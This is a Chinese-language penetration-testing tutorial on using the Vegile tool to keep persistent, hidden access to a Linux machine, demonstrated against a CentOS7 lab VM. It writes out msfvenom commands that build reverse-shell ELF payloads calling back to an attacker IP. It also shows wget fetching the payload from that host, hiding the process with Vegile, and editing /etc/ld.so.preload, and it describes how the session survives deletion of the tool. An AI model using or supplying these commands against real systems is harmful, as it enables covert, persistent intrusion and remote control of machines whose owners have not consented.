Vegile 是用于 linux 系统渗透测试中的权限维持。Vegile 这个工具将设置一个后门/rootkit,并且这个后门会直接隐藏进程,无限连接 metesploit,持续维持你的 Metepreter 会话,即使木马进程被杀死,它依然会再次重新运行,换句话说是该进程无限循环的。
一、生成恶意文件
生成恶意文件让目标系统执行来获取 shell,主要目的是用来获取权限
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.47.165 LPORT=8080 -b "\x00" -f elf -o /var/www/html/notfile-backdoor
再生成一个隐藏执行的后门
msfvenom -a x64 --platform linux -p linux/x64/shell/reverse_tcp LHOST=192.168.47.165 LPORT=4444 -b "\x00" -f elf -o /var/www/html/notfile-ghost
二、上传Vergile并启动Apache服务
Vegile 常用方法:
./Vegile --i 隐藏你的后门
./vegile --u 无限复制你的 metasploit 会话,即使被他 kill ,依然可以再次运行
使用注意事项
木马一定要放在Vegile 目录下
Vegile 一般用于维持 meterpreter 会话;
三、获取Linux 系统的shell
开启metersploit,运行监听模块,具体配置如下
打开CentOS7的虚拟机,通过apache服务器下载第一个恶意文件并运行
使用shell类型的payload,连接成功后没有提示
查看网络连接状态
查看IP地址,找不到命令怎么办
使用绝对路径就可以找到
四、创建无文件后门程序
配置监听 4444端口
打开一个新的终端开启metersploit监听,配置信息如下,payload最好用shell,比较小容易短时间发送完成
用之前建立的连接下载用于隐藏进程的工具,并将其解压
切换到Vegile目录,给其增加执行权限
//下载用于隐藏执行的后门程序 wget 192.168.47.165/notfile-ghost
//添加执行权限 chmod +x notfile-ghost
//隐藏后门程序执行 ./Vegile --i notfile-ghost
ERROR: ld.so: object '/usr/local/lib/libprocesshider.so' from /etc/ld.so.preload cannot be preloaded: ignored.
这个错误是由于64位系统缺少某个文件导致的,通过echo "" >/etc/ld.so.preload可以解决
在另一终端监听的msf也能连接到CentOS7虚拟机
可以发现,即使Vegile工具和后门文件被一起删除了,会话依然没有断开,依然可以运行各种命令来控制CentOS7虚拟机,而同样的尝试针对第一个恶意软件尝试后,就没有任何的命令都没有回应了,说明连接断开了